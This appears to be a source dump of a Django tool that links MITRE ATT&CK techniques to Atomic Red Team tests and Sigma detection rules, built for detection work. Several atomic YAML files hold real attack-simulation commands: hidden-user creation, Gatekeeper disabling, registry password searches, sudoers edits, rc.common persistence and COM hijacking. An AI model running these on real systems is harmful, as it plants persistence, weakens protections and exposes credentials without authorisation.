├── elemental ├── matrix │ ├── __init__.py │ ├── migrations │ │ ├── __init__.py │ │ └── __pycache__ │ │ │ ├── __init__.cpython-36.pyc │ │ │ └── 0001_initial.cpython-36.pyc │ ├── templatetags │ │ ├── __init__.py │ │ ├── __pycache__ │ │ │ ├── __init__.cpython-36.pyc │ │ │ └── short_name.cpython-36.pyc │ │ └── short_name.py │ ├── tests.py │ ├── apps.py │ ├── templates │ │ ├── elemental.png │ │ └── matrix │ │ │ ├── atomic.html │ │ │ ├── tactic_detail.html │ │ │ ├── addSigma.html │ │ │ ├── noteForm.html │ │ │ ├── note_form.html │ │ │ ├── TacticTemplate.html │ │ │ ├── note_detail.html │ │ │ ├── addnote.html │ │ │ └── tactic_list.html │ ├── static │ │ └── matrix │ │ │ ├── elemental.png │ │ │ └── style.css │ ├── __pycache__ │ │ ├── urls.cpython-36.pyc │ │ ├── admin.cpython-36.pyc │ │ ├── forms.cpython-36.pyc │ │ ├── models.cpython-36.pyc │ │ ├── views.cpython-36.pyc │ │ └── __init__.cpython-36.pyc │ └── forms.py ├── elemental │ ├── __init__.py │ ├── __pycache__ │ │ ├── urls.cpython-36.pyc │ │ ├── wsgi.cpython-36.pyc │ │ ├── __init__.cpython-36.pyc │ │ └── settings.cpython-36.pyc │ └── wsgi.py ├── db.sqlite3 ├── media │ ├── elemental.png │ ├── atomics │ │ ├── T1152.yaml │ │ ├── T1169.yaml │ │ ├── T1147.yaml │ │ ├── T1214.yaml │ │ ├── T1151.yaml │ │ ├── T1163.yaml │ │ ├── T1496.yaml │ │ ├── T1122.yaml │ │ ├── T1144.yaml │ │ ├── T1030.yaml │ │ ├── T1128.yaml │ │ ├── T1150.yaml │ │ ├── T1196.yaml │ │ ├── T1009.yaml │ │ ├── T1127.yaml │ │ ├── T1103.yaml │ │ ├── T1097.yaml │ │ ├── T1005.yaml │ │ ├── T1142.yaml │ │ ├── T1031.yaml │ │ ├── T1154.yaml │ │ ├── T1179.yaml │ │ ├── T1042.yaml │ │ ├── T1073.yaml │ │ ├── T1132.yaml │ │ ├── T1038.yaml │ │ ├── T1056.yaml │ │ ├── T1059.yaml │ │ ├── T1134.yaml │ │ ├── T1115.yaml │ │ ├── T1100.yaml │ │ ├── T1124.yaml │ │ ├── T1208.yaml │ │ ├── T1207.yaml │ │ ├── T1010.yaml │ │ ├── T1153.yaml │ │ ├── T1500.yaml │ │ ├── T1518.yaml │ │ ├── T1030.md │ │ ├── T1057.yaml │ │ ├── T1148.yaml │ │ ├── T1058.yaml │ │ ├── T1114.yaml │ │ ├── T1143.yaml │ │ ├── T1139.yaml │ │ ├── T1160.yaml │ │ ├── T1206.yaml │ │ └── T1156.yaml │ └── sigma_rules │ │ ├── win_susp_wmi_login.yml │ │ ├── win_psexesvc_start.yml │ │ ├── win_susp_codeintegrity_check_failure.yml │ │ ├── sysmon_susp_driver_load.yml │ │ ├── win_susp_taskmgr_localsystem.yml │ │ ├── proxy_cobalt_ocsp.yml │ │ ├── sysmon_ghostpack_safetykatz.yml │ │ ├── win_susp_outlook_temp.yml │ │ ├── win_powershell_xor_commandline.yml │ │ ├── powershell_suspicious_download.yml │ │ ├── win_lethalhta.yml │ │ ├── win_susp_sam_dump.yml │ │ ├── apt_cloudhopper.yml │ │ ├── win_encoded_frombase64string.yml │ │ ├── win_susp_ntdsutil.yml │ │ ├── win_susp_rasdial_activity.yml │ │ ├── proxy_cobalt_onedrive.yml │ │ ├── win_admin_share_access.yml │ │ ├── win_susp_lsass_dump.yml │ │ ├── sysmon_wmi_event_subscription.yml │ │ ├── win_rare_schtask_creation.yml │ │ ├── apt_ta17_293a_ps.yml │ │ ├── apt_turla_service_png.yml │ │ ├── lnx_auditd_web_rce.yml │ │ ├── sysmon_quarkspw_filedump.yml │ │ ├── win_encoded_iex.yml │ │ ├── apt_carbonpaper_turla.yml │ │ ├── powershell_psattack.yml │ │ ├── sysmon_wmi_persistence_script_event_consumer_write.yml │ │ ├── win_wmi_backdoor_exchange_transport_agent.yml │ │ ├── win_susp_security_eventlog_cleared.yml │ │ ├── win_wmi_persistence_script_event_consumer.yml │ │ ├── apt_stonedrill.yml │ │ ├── win_powershell_b64_shellcode.yml │ │ ├── win_rare_service_installs.yml │ │ ├── apt_hurricane_panda.yml │ │ ├── win_susp_csc.yml │ │ ├── win_vul_java_remote_debugging.yml │ │ ├── win_win10_sched_task_0day.yml │ │ ├── apt_apt29_thinktanks.yml │ │ ├── sysmon_wmi_persistence_commandline_event_consumer.yml │ │ ├── win_mavinject_proc_inj.yml │ │ ├── win_netsh_port_fwd.yml │ │ ├── win_susp_backup_delete.yml │ │ ├── win_susp_dsrm_password_change.yml │ │ ├── win_control_panel_item.yml │ │ ├── win_netsh_port_fwd_3389.yml │ │ ├── sysmon_uac_bypass_sdclt.yml │ │ ├── win_sdbinst_shim_persistence.yml │ │ ├── win_susp_taskmgr_parent.yml │ │ ├── powershell_ntfs_ads_access.yml │ │ ├── apt_tropictrooper.yml │ │ ├── win_susp_eventlog_cleared.yml │ │ ├── net_susp_dns_txt_exec_strings.yml │ │ ├── win_apt_bluemashroom.yml │ │ ├── win_susp_sysvol_access.yml │ │ ├── sysmon_susp_powershell_rundll32.yml │ │ ├── win_mal_ursnif.yml │ │ ├── win_rdp_bluekeep_poc_scanner.yml │ │ ├── win_susp_tscon_localsystem.yml │ │ ├── win_susp_msiexec_cwd.yml │ │ ├── powershell_prompt_credentials.yml │ │ ├── win_susp_bcdedit.yml │ │ ├── win_netsh_fw_add.yml │ │ ├── win_impacket_secretdump.yml │ │ ├── win_susp_dhcp_config.yml │ │ ├── powershell_exe_calling_ps.yml │ │ ├── win_malware_dridex.yml │ │ ├── win_rdp_localhost_login.yml │ │ ├── powershell_suspicious_invocation_generic.yml │ │ ├── win_mal_wceaux_dll.yml │ │ ├── win_susp_ping_hex_ip.yml │ │ ├── win_cmdkey_recon.yml │ │ ├── win_susp_svchost.yml │ │ ├── win_usb_device_plugged.yml │ │ ├── sysmon_mimikatz_trough_winrm.yml │ │ ├── win_susp_dnx.yml │ │ ├── win_susp_interactive_logons.yml │ │ ├── win_susp_psr_capture_screenshots.yml │ │ ├── win_susp_schtask_creation.yml │ │ ├── apt_zxshell.yml │ │ ├── net_dns_c2_detection.yml │ │ ├── powershell_suspicious_keywords.yml │ │ ├── win_exploit_cve_2017_8759.yml │ │ ├── win_susp_iss_module_install.yml │ │ ├── win_susp_ps_appdata.yml │ │ ├── win_spn_enum.yml │ │ ├── win_susp_calc.yml │ │ ├── apt_bear_activity_gtr19.yml │ │ ├── sysmon_renamed_procdump.yml │ │ ├── sysmon_susp_image_load.yml │ │ ├── win_susp_ntlm_auth.yml │ │ ├── powershell_downgrade_attack.yml │ │ ├── win_susp_script_execution.yml │ │ ├── sysmon_lsass_memdump.yml │ │ ├── win_exploit_cve_2017_0261.yml │ │ ├── win_process_creation_bitsadmin_download.yml │ │ ├── win_susp_rottenpotato.yml │ │ ├── win_hack_smbexec.yml │ │ ├── win_rdp_potential_cve-2019-0708.yml │ │ ├── win_workflow_compiler.yml │ │ ├── powershell_shellcode_b64.yml │ │ ├── sysmon_rdp_reverse_tunnel.yml │ │ ├── win_mmc_spawn_shell.yml │ │ ├── win_susp_openwith.yml │ │ ├── win_susp_recon_activity.yml │ │ ├── win_user_added_to_local_administrators.yml │ │ ├── av_webshell.yml │ │ ├── sysmon_ads_executable.yml │ │ ├── sysmon_susp_lsass_dll_load.yml │ │ ├── win_exploit_cve_2015_1641.yml │ │ ├── lnx_auditd_masquerading_crond.yml │ │ ├── win_powershell_download.yml │ │ ├── win_susp_samr_pwset.yml │ │ ├── win_susp_tscon_rdp_redirect.yml │ │ ├── apt_equationgroup_dll_u_load.yml │ │ ├── sysmon_password_dumper_lsass.yml │ │ ├── win_netsh_packet_capture.yml │ │ ├── win_susp_bginfo.yml │ │ ├── win_susp_dxcap.yml │ │ ├── win_susp_outlook.yml │ │ ├── win_susp_rc4_kerberos.yml │ │ ├── apt_empiremonkey.yml │ │ ├── win_susp_cdb.yml │ │ ├── win_user_creation.yml │ │ ├── lnx_auditd_user_discovery.yml │ │ ├── sysmon_win_binary_github_com.yml │ │ ├── win_admin_rdp_login.yml │ │ ├── win_susp_add_sid_history.yml │ │ ├── win_susp_control_dll_load.yml │ │ ├── win_susp_dns_config.yml │ │ ├── crime_fireball.yml │ │ ├── win_susp_execution_path.yml │ │ ├── win_susp_sdelete.yml │ │ ├── win_wmi_spwns_powershell.yml │ │ ├── av_password_dumper.yml │ │ ├── win_susp_prog_location_process_starts.yml │ │ ├── win_atsvc_task.yml │ │ ├── win_overpass_the_hash.yml │ │ ├── sysmon_registry_persistence_key_linking.yml │ │ ├── web_cve_2018_2894_weblogic_exploit.yml │ │ ├── win_powershell_dll_execution.yml │ │ ├── win_susp_devtoolslauncher.yml │ │ ├── win_hack_rubeus.yml │ │ ├── apt_babyshark.yml │ │ ├── win_susp_rundll32_by_ordinal.yml │ │ ├── proxy_raw_paste_service_access.yml │ │ ├── sysmon_susp_download_run_key.yml │ │ ├── powershell_suspicious_invocation_specific.yml │ │ ├── sysmon_win_binary_susp_com.yml │ │ ├── win_exploit_cve_2017_11882.yml │ │ ├── win_susp_msoffice.yml │ │ ├── win_susp_whoami.yml │ │ ├── win_powershell_amsi_bypass.yml │ │ ├── win_service_execution.yml │ │ ├── win_webshell_spawn.yml │ │ ├── lnx_sudo_cve_2019_14287.yml │ │ ├── sysmon_cobaltstrike_process_injection.yml │ │ ├── win_susp_csc_folder.yml │ │ ├── sysmon_cactustorch.yml │ │ ├── win_mal_creddumper.yml │ │ ├── win_susp_execution_path_webserver.yml │ │ ├── apt_slingshot.yml │ │ ├── apt_sofacy.yml │ │ ├── powershell_data_compressed.yml │ │ ├── win_alert_lsass_access.yml │ │ ├── win_rdp_reverse_tunnel.yml │ │ └── win_susp_comsvcs_procdump.yml ├── __pycache__ │ ├── import_abbrvs.cpython-36.pyc │ ├── atomics_imports.cpython-36.pyc │ ├── attack_imports.cpython-36.pyc │ ├── attackcti_exporter.cpython-36.pyc │ └── sigma_rule_imports.cpython-36.pyc ├── requirements.txt └── manage.py └── images ├── 97.png ├── Atomic.png ├── Sigma.png ├── Technique.png ├── AtomicYaml.png └── elementalUI.png /elemental/matrix/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /elemental/elemental/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /elemental/matrix/migrations/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /elemental/matrix/templatetags/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /images/97.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/images/97.png -------------------------------------------------------------------------------- /elemental/matrix/tests.py: -------------------------------------------------------------------------------- 1 | from django.test import TestCase 2 | 3 | # Create your tests here. 4 | -------------------------------------------------------------------------------- /images/Atomic.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/images/Atomic.png -------------------------------------------------------------------------------- /images/Sigma.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/images/Sigma.png -------------------------------------------------------------------------------- /elemental/db.sqlite3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/db.sqlite3 -------------------------------------------------------------------------------- /images/Technique.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/images/Technique.png -------------------------------------------------------------------------------- /images/AtomicYaml.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/images/AtomicYaml.png -------------------------------------------------------------------------------- /images/elementalUI.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/images/elementalUI.png -------------------------------------------------------------------------------- /elemental/media/elemental.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/media/elemental.png -------------------------------------------------------------------------------- /elemental/matrix/apps.py: -------------------------------------------------------------------------------- 1 | from django.apps import AppConfig 2 | 3 | 4 | class MatrixConfig(AppConfig): 5 | name = 'matrix' 6 | -------------------------------------------------------------------------------- /elemental/matrix/templates/elemental.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/matrix/templates/elemental.png -------------------------------------------------------------------------------- /elemental/matrix/static/matrix/elemental.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/matrix/static/matrix/elemental.png -------------------------------------------------------------------------------- /elemental/matrix/__pycache__/urls.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/matrix/__pycache__/urls.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/__pycache__/import_abbrvs.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/__pycache__/import_abbrvs.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/matrix/__pycache__/admin.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/matrix/__pycache__/admin.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/matrix/__pycache__/forms.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/matrix/__pycache__/forms.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/matrix/__pycache__/models.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/matrix/__pycache__/models.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/matrix/__pycache__/views.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/matrix/__pycache__/views.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/__pycache__/atomics_imports.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/__pycache__/atomics_imports.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/__pycache__/attack_imports.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/__pycache__/attack_imports.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/elemental/__pycache__/urls.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/elemental/__pycache__/urls.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/elemental/__pycache__/wsgi.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/elemental/__pycache__/wsgi.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/matrix/__pycache__/__init__.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/matrix/__pycache__/__init__.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/__pycache__/attackcti_exporter.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/__pycache__/attackcti_exporter.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/__pycache__/sigma_rule_imports.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/__pycache__/sigma_rule_imports.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/elemental/__pycache__/__init__.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/elemental/__pycache__/__init__.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/elemental/__pycache__/settings.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/elemental/__pycache__/settings.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/matrix/templates/matrix/atomic.html: -------------------------------------------------------------------------------- 1 | {% extends "base_generic.html" %} 2 | 3 | {% block content %} 4 | 5 |
{{ atom | safe }}
6 | 7 | {% endblock %} 8 | 9 | -------------------------------------------------------------------------------- /elemental/matrix/migrations/__pycache__/__init__.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/matrix/migrations/__pycache__/__init__.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/matrix/templatetags/__pycache__/__init__.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/matrix/templatetags/__pycache__/__init__.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/matrix/migrations/__pycache__/0001_initial.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/matrix/migrations/__pycache__/0001_initial.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/matrix/templatetags/__pycache__/short_name.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Elemental-attack/Elemental/HEAD/elemental/matrix/templatetags/__pycache__/short_name.cpython-36.pyc -------------------------------------------------------------------------------- /elemental/matrix/static/matrix/style.css: -------------------------------------------------------------------------------- 1 | .sidebar-nav { 2 | margin-top: 20px; 3 | padding: 0; 4 | list-style: none; 5 | } 6 | .coder { 7 | width: 800px; 8 | color: blueviolet; 9 | background-color: gray; 10 | } 11 | li a { 12 | color: blue; 13 | } -------------------------------------------------------------------------------- /elemental/matrix/templates/matrix/tactic_detail.html: -------------------------------------------------------------------------------- 1 | {% extends "base_generic.html" %} 2 | 3 | {% block content %} 4 | 5 |

Tactic Title: {{ tactic.tactic_name }}

6 | 7 |

Summary: {{ tactic.tactic_description }}

8 | 9 | {% endblock %} 10 | 11 | -------------------------------------------------------------------------------- /elemental/matrix/templates/matrix/addSigma.html: -------------------------------------------------------------------------------- 1 | {% extends "base_generic.html" %} 2 | 3 | 4 | {% load short_name %} 5 | 6 | {% block title %}Elemental{% endblock %} 7 | 8 | {% block content %} 9 | 10 |
11 | 12 | {% endblock %} 13 | -------------------------------------------------------------------------------- /elemental/matrix/templatetags/short_name.py: -------------------------------------------------------------------------------- 1 | from django import template 2 | 3 | register = template.Library() 4 | 5 | @register.filter 6 | def short_name(value): 7 | return value.replace(" ","-").lower() 8 | 9 | @register.filter 10 | def rem_slash(value): 11 | return value.replace("/","/ ") 12 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1152.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1152 3 | display_name: Launchctl 4 | 5 | atomic_tests: 6 | - name: Launchctl 7 | description: | 8 | Utilize launchctl 9 | 10 | supported_platforms: 11 | - macos 12 | 13 | executor: 14 | name: sh 15 | command: | 16 | launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator 17 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1169.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1169 3 | display_name: SUDO 4 | 5 | atomic_tests: 6 | - name: Sudo usage 7 | description: | 8 | Common Sudo enumeration methods. 9 | 10 | supported_platforms: 11 | - macos 12 | - linux 13 | 14 | executor: 15 | name: sh 16 | command: | 17 | sudo -l 18 | sudo su 19 | cat /etc/sudoers 20 | vim /etc/sudoers 21 | -------------------------------------------------------------------------------- /elemental/matrix/forms.py: -------------------------------------------------------------------------------- 1 | from django.core.exceptions import ValidationError 2 | from django.utils.translation import ugettext_lazy as _ 3 | import datetime # for checking renewal date range. 4 | from matrix.models import Technique, Note 5 | from django import forms 6 | 7 | class noteForm(forms.ModelForm): 8 | class Meta: 9 | model = Note 10 | fields = ('technique', 'note', 'date') 11 | 12 | 13 | -------------------------------------------------------------------------------- /elemental/matrix/templates/matrix/noteForm.html: -------------------------------------------------------------------------------- 1 | {% extends "base_generic_no_header.html" %} 2 | 3 | {% block content %} 4 | 5 |
6 | {% csrf_token %} 7 |
8 | 9 | 10 | {{ form.as_table }} 11 |
12 | 13 |
14 | 15 |
16 | {% endblock %} -------------------------------------------------------------------------------- /elemental/matrix/templates/matrix/note_form.html: -------------------------------------------------------------------------------- 1 | {% extends "base_generic_no_header.html" %} 2 | 3 | {% block content %} 4 | 5 |
6 | {% csrf_token %} 7 |
8 | 9 | 10 | {{ form.as_table }} 11 |
12 | 13 |
14 | 15 |
16 | {% endblock %} -------------------------------------------------------------------------------- /elemental/elemental/wsgi.py: -------------------------------------------------------------------------------- 1 | """ 2 | WSGI config for elemental project. 3 | 4 | It exposes the WSGI callable as a module-level variable named ``application``. 5 | 6 | For more information on this file, see 7 | https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/ 8 | """ 9 | 10 | import os 11 | 12 | from django.core.wsgi import get_wsgi_application 13 | 14 | os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'elemental.settings') 15 | 16 | application = get_wsgi_application() 17 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1147.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1147 3 | display_name: Hidden Users 4 | 5 | atomic_tests: 6 | - name: Hidden Users 7 | description: | 8 | Add a hidden user on MacOS 9 | 10 | supported_platforms: 11 | - macos 12 | 13 | input_arguments: 14 | user_name: 15 | description: username to add 16 | type: string 17 | default: APT 18 | 19 | executor: 20 | name: sh 21 | command: | 22 | sudo dscl . -create /Users/#{user_name} UniqueID 333 23 | -------------------------------------------------------------------------------- /elemental/matrix/templates/matrix/TacticTemplate.html: -------------------------------------------------------------------------------- 1 | {% extends "base_generic.html" %} 2 | 3 | {% block content %} 4 |

Tactic List On the MODEL TEMPLATE CLASS

5 | {% if tatic_list %} 6 | 13 | {% else %} 14 |

There are no Tactics.

15 | {% endif %} 16 | {% endblock %} -------------------------------------------------------------------------------- /elemental/media/atomics/T1214.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1214 3 | display_name: Credentials in Registry 4 | 5 | atomic_tests: 6 | - name: Enumeration for Credentials in Registry 7 | description: | 8 | Queries to enumerate for credentials in the Registry. 9 | 10 | supported_platforms: 11 | - windows 12 | 13 | executor: 14 | name: command_prompt 15 | elevation_required: false 16 | command: | 17 | reg query HKLM /f password /t REG_SZ /s 18 | reg query HKCU /f password /t REG_SZ /s 19 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1151.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1151 3 | display_name: Space After Filename 4 | 5 | atomic_tests: 6 | - name: Space After Filename 7 | description: | 8 | Space After Filename 9 | 10 | supported_platforms: 11 | - macos 12 | 13 | executor: 14 | name: manual 15 | steps: | 16 | 1. echo '#!/bin/bash\necho "print \"hello, world!\"" | /usr/bin/python\nexit' > execute.txt && chmod +x execute.txt 17 | 18 | 2. mv execute.txt "execute.txt " 19 | 20 | 3. ./execute.txt\ 21 | -------------------------------------------------------------------------------- /elemental/matrix/templates/matrix/note_detail.html: -------------------------------------------------------------------------------- 1 | {% extends "base_generic_no_header.html" %} 2 | 3 | {% block content %} 4 | 5 |

Note: {{ note }}

6 |

{{note.date}}

7 | 8 |
9 |

Technique Note for: {{note.technique}}

10 | 11 | Edit Note 12 | 13 | 17 | 18 |
19 | {% endblock %} 20 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1163.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1163 3 | display_name: rc.common 4 | 5 | atomic_tests: 6 | - name: rc.common 7 | description: | 8 | Modify rc.common 9 | 10 | [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html) 11 | 12 | supported_platforms: 13 | - macos 14 | 15 | executor: 16 | name: sh 17 | command: | 18 | echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common 19 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1496.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1496 3 | display_name: Resource Hijacking 4 | 5 | atomic_tests: 6 | - name: macOS/Linux - Simulate CPU Load with Yes 7 | description: | 8 | This test simulates a high CPU load as you might observe during cryptojacking attacks. 9 | End the test by using CTRL/CMD+C to break. 10 | 11 | supported_platforms: 12 | - macos 13 | - centos 14 | - ubuntu 15 | - linux 16 | 17 | executor: 18 | name: bash 19 | command: | 20 | yes > /dev/null 21 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1122.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1122 3 | display_name: Component Object Model Hijacking 4 | 5 | atomic_tests: 6 | - name: Component Object Model Hijacking 7 | description: | 8 | Hijack COM Object used by certutil.exe 9 | 10 | supported_platforms: 11 | - windows 12 | executor: 13 | name: command_prompt 14 | command: | 15 | reg import PathToAtomicsFolder\T1122\src\COMHijack.reg 16 | certutil.exe -CAInfo 17 | cleanup_command: | 18 | reg import PathToAtomicsFolder\T1122\src\COMHijackCleanup.reg 19 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1144.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1144 3 | display_name: Gatekeeper Bypass 4 | 5 | atomic_tests: 6 | - name: Gatekeeper Bypass 7 | description: | 8 | Gatekeeper Bypass via command line 9 | 10 | supported_platforms: 11 | - macos 12 | 13 | input_arguments: 14 | app_path: 15 | description: Path to app to be used 16 | type: Path 17 | default: myapp.app 18 | 19 | executor: 20 | name: sh 21 | command: | 22 | sudo xattr -r -d com.apple.quarantine #{app_path} 23 | sudo spctl --master-disable 24 | -------------------------------------------------------------------------------- /elemental/requirements.txt: -------------------------------------------------------------------------------- 1 | antlr4-python3-runtime==4.7.2 2 | attackcti==0.2.7 3 | certifi==2019.9.11 4 | cffi==1.13.0 5 | chardet==3.0.4 6 | Django==2.2.24 7 | django-markdownx==2.0.28 8 | gitdb2==2.0.6 9 | GitPython==3.0.3 10 | idna==2.8 11 | Markdown==3.1.1 12 | numpy==1.17.2 13 | pandas==0.25.1 14 | Pillow>=6.2.2 15 | pycparser==2.19 16 | python-dateutil==2.8.0 17 | pytz==2019.2 18 | requests==2.22.0 19 | simplejson==3.16.0 20 | six==1.12.0 21 | smmap2==2.0.5 22 | sqlparse==0.3.0 23 | stix2==1.2.1 24 | stix2-patterns==1.1.0 25 | taxii2-client==0.5.0 26 | urllib3==1.26.5 27 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_wmi_login.yml: -------------------------------------------------------------------------------- 1 | title: Login with WMI 2 | id: 5af54681-df95-4c26-854f-2565e13cfab0 3 | status: stable 4 | description: Detection of logins performed with WMI 5 | author: Thomas Patzke 6 | tags: 7 | - attack.execution 8 | - attack.t1047 9 | logsource: 10 | product: windows 11 | service: security 12 | detection: 13 | selection: 14 | EventID: 4624 15 | ProcessName: "*\\WmiPrvSE.exe" 16 | condition: selection 17 | falsepositives: 18 | - Monitoring tools 19 | - Legitimate system administration 20 | level: low 21 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_psexesvc_start.yml: -------------------------------------------------------------------------------- 1 | title: PsExec Service Start 2 | id: 3ede524d-21cc-472d-a3ce-d21b568d8db7 3 | description: Detects a PsExec service start 4 | author: Florian Roth 5 | date: 2018/03/13 6 | modified: 2012/12/11 7 | tags: 8 | - attack.execution 9 | - attack.t1035 10 | - attack.s0029 11 | logsource: 12 | category: process_creation 13 | product: windows 14 | detection: 15 | selection: 16 | ProcessCommandLine: C:\Windows\PSEXESVC.exe 17 | condition: selection 18 | falsepositives: 19 | - Administrative activity 20 | level: low 21 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1030.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1030 3 | display_name: Data Transfer Size Limits 4 | 5 | atomic_tests: 6 | - name: Data Transfer Size Limits 7 | description: | 8 | Take a file/directory, split it into 5Mb chunks 9 | 10 | supported_platforms: 11 | - macos 12 | - centos 13 | - ubuntu 14 | - linux 15 | 16 | executor: 17 | name: sh 18 | elevation_required: false 19 | command: | 20 | cd /tmp/ 21 | dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1 22 | split -b 5000000 /tmp/victim-whole-file 23 | ls -l 24 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1128.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1128 3 | display_name: Netsh Helper DLL 4 | 5 | atomic_tests: 6 | - name: Netsh Helper DLL Registration 7 | description: | 8 | Netsh interacts with other operating system components using dynamic-link library (DLL) files 9 | 10 | supported_platforms: 11 | - windows 12 | 13 | input_arguments: 14 | helper_file: 15 | description: Path to DLL 16 | type: Path 17 | default: C:\Path\file.dll 18 | 19 | executor: 20 | name: command_prompt 21 | command: | 22 | netsh.exe add helper #{helper_file} 23 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_codeintegrity_check_failure.yml: -------------------------------------------------------------------------------- 1 | title: Failed Code Integrity Checks 2 | id: 470ec5fa-7b4e-4071-b200-4c753100f49b 3 | status: stable 4 | description: Code integrity failures may indicate tampered executables. 5 | author: Thomas Patzke 6 | tags: 7 | - attack.defense_evasion 8 | - attack.t1009 9 | logsource: 10 | product: windows 11 | service: security 12 | detection: 13 | selection: 14 | EventID: 15 | - 5038 16 | - 6281 17 | condition: selection 18 | falsepositives: 19 | - Disk device errors 20 | level: low 21 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1150.yaml: -------------------------------------------------------------------------------- 